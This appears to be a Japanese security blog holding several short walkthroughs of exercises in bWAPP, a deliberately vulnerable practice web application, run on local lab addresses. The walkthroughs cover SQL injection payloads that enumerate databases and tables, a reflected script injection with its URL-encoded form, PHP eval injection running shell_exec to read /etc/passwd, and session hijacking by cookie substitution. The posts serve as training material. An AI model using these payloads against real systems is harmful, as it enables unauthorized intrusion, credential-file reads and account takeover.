shikata ga nai

Private? There is no such things.

bWAPPでA1-SQL Injection (Select/GET)

Hello there, ('ω')ノ

 

このメニューもやっていなかったようで。

 

f:id:ThisIsOne:20201031114702p:plain

 

Goボタンを押すと下記のようにURL上にパラメータが表示されて。

 http://192.168.1.46/bWAPP/sqli_2.php?movie=1&action=go

 

f:id:ThisIsOne:20201031114906p:plain

 

URL上でパラメータの内容を変更して、別の情報を表示できて。

 http://192.168.1.46/bWAPP/sqli_2.php?movie=2&action=go

 

f:id:ThisIsOne:20201031115006p:plain

 

パラメータを追加しても機能するようで。

 http://192.168.1.46/bWAPP/sqli_2.php?movie=2 and 1=1 &action=go

 

f:id:ThisIsOne:20201031115226p:plain

 

こちらは、追加したパラメータが条件に合ってない場合の表示結果で。

 http://192.168.1.46/bWAPP/sqli_2.php?movie=2 and 1=2 &action=go

 

f:id:ThisIsOne:20201031115118p:plain

 

セキュリティレベルをhighにしてみると、しっかりとフィルタリングされて。
 http://192.168.1.46/bWAPP/sqli_2.php?movie=2 and 1=2 &action=go

 

f:id:ThisIsOne:20201031115620p:plain

 

このような脆弱性があると。

たとえば、下記のようにデータベースの基本情報を取得してから。

具体的なテーブル名やカラム名も取得することも可能で。

 http://192.168.1.46/bWAPP/sqli_2.php?movie=0 UNION SELECT ALL null,database(),@@version,@@datadir,table_name,null,null from information_schema.tables #

 

f:id:ThisIsOne:20201031130748p:plain

 

Best regards, (^^ゞ

bWAPPでA1-SQL Injection (Search/GET)

Hello there, ('ω')ノ

 

こんなインジェクションもやっていなかったものかと。

 

f:id:ThisIsOne:20201030161323p:plain

 

まずは、正常動作確認を。

 

f:id:ThisIsOne:20201030161558p:plain

 

もうひとつ。

 

f:id:ThisIsOne:20201030161638p:plain

 

下記のいつものパターンを入力すると脆弱性があることがわかったので。

 ' or 1=1 -- 

 

f:id:ThisIsOne:20201030161741p:plain

 

もう少し情報収集をしたいので、とりあえず下記のコードを入力すると。

Syntaxエラーがでたので。

 ' union select 1,2,3,4,5 -- 

 

f:id:ThisIsOne:20201030161917p:plain

 

最後のコメントアウトのところを別のコードに変更してみると。

どうやら機能したみたいで。

ただ、カラム数がちがうとのことで。

 ' union select 1,2,3,4,5 #

 

f:id:ThisIsOne:20201030162018p:plain

 

試行錯誤した結果、カラム数は7個らしく。

 ' union select 1,2,3,4,5,6,7 #

 

f:id:ThisIsOne:20201030162119p:plain

 

表示されたカラムの箇所をつかって情報取集を。

 ' union select 1,user(),database(),4,5,6,7 #

 

f:id:ThisIsOne:20201030162253p:plain

 

Best regards, (^^ゞ

bWAPPでA1-HTML Injection - Reflected (GET)

Hello there, ('ω')ノ

 

A1のメニューもやっていなかたようで。

 

f:id:ThisIsOne:20201029124658p:plain

 

まずは動作確認をして。

 

f:id:ThisIsOne:20201029124733p:plain

 

HTMLソースコードを見てみると。

下記のファイルが呼び出されているようで。

ソースコードを見れば攻め方はわかるのですが。

 /owaspbwa/bwapp-git/bWAPP/htmli_get.php

 

f:id:ThisIsOne:20201029125514p:plain

 

とりあえずは、下記の基本的なインジェクションを入力すると成功して。

 <script>alert("hello")</script>

 

f:id:ThisIsOne:20201029125802p:plain

 

次にセキュリティレベルをmediumに変更して。

 

f:id:ThisIsOne:20201029130304p:plain

 

今度は、同じ入力では成功せず。

 

f:id:ThisIsOne:20201029130351p:plain

 

とりあえず、下記をBurp SuiteでURLエンコードしてみて。

 <script>alert("hello")</script>

 

f:id:ThisIsOne:20201029130820p:plain

 

エンコードした内容を入力してみると成功して。

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%68%65%6c%6c%6f%22%29%3c%2f%73%63%72%69%70%74%3e

 

f:id:ThisIsOne:20201029130733p:plain

 

ちなみにhighレベルだと、PHPソースコード内でしっかりと対応しているようで。

 

f:id:ThisIsOne:20201029131011p:plain

 

Best regards, (^^ゞ

bWAPPでA9-PHP Eval Function

Hello there, ('ω')ノ

 

こちらのメニューもやっていなかったので。

 

f:id:ThisIsOne:20201028153939p:plain

 

eval関数は、引数の文字列をPHPコードとして実行するので。

例えば、下記のサイトを参考にして。

 https://www.exploit-db.com/papers/13694

 

f:id:ThisIsOne:20201028152813p:plain

 

下記のように引数を渡すと。

 http://10.4.128.57/bWAPP/php_eval.php?eval=phpinfo();

 

f:id:ThisIsOne:20201028152208p:plain

 

さらには、下記のような引数でも。

 http://10.4.128.57/bWAPP/php_eval.php?eval=echo%20shell_exec(%22cat%20/etc/passwd%22);

 

f:id:ThisIsOne:20201028153230p:plain

 

Best regards, (^^ゞ

bWAPPでA2-Session Managemant-Cookies(Secure)

Hello there, ('ω')ノ

 

bWAPPの記事を振り返ってみると、まだやってなかったメニューがあったので。

まずは、下記でログインして。

 bee/bug

 

f:id:ThisIsOne:20201028144846p:plain

 

新しいプライベートウィンドウで、もう一つのブラウザを起動して。

別途、作成していた下記でログインして。

 user/pass

 

Cookieを確認すると下記のようで。

 hfujioqarapa74vhv9a4g09gv2

 

f:id:ThisIsOne:20201028144502p:plain

 

はじめの画面でもCookieを確認して。

 

f:id:ThisIsOne:20201028144238p:plain

 

インターセプトして、Cookie情報を下記に書き換えて実行すると。

 hfujioqarapa74vhv9a4g09gv2

 

f:id:ThisIsOne:20201028144959p:plain

 

二番目に開いたユーザ名に変更された。

 

f:id:ThisIsOne:20201028145034p:plain

 

Best regards, (^^ゞ

コロナを甘く見るな!ひとりひとりの自覚をもった行動で医療従事者を助けよう。

f:id:ThisIsOne:20200404115457p:plain